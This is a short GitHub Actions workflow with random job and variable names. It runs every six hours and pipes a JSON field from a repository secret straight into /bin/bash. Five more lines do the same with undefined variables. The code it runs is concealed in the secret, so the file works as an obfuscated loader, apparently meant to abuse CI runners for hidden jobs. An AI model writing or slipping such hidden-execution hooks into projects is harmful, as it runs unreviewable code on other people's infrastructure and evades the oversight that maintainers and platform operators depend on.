name: zhemedadcak

on:
  workflow_dispatch:
  schedule:
    - cron: '1 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhemedadcak
        env:
          mbkd9650: ${{ secrets.mbkd9650 }}
        run: |
          echo $mbkd9650 | jq -r .ca25 | /bin/bash
          echo $qgl64861 | jq -r .vop448 | /bin/bash
          echo $xrqvd009 | jq -r .tgfm54 | /bin/bash
          echo $ney6 | jq -r .fwckm726 | /bin/bash
          echo $syyag13112 | jq -r .bc734 | /bin/bash
          echo $vpv01 | jq -r .iy612 | /bin/bash

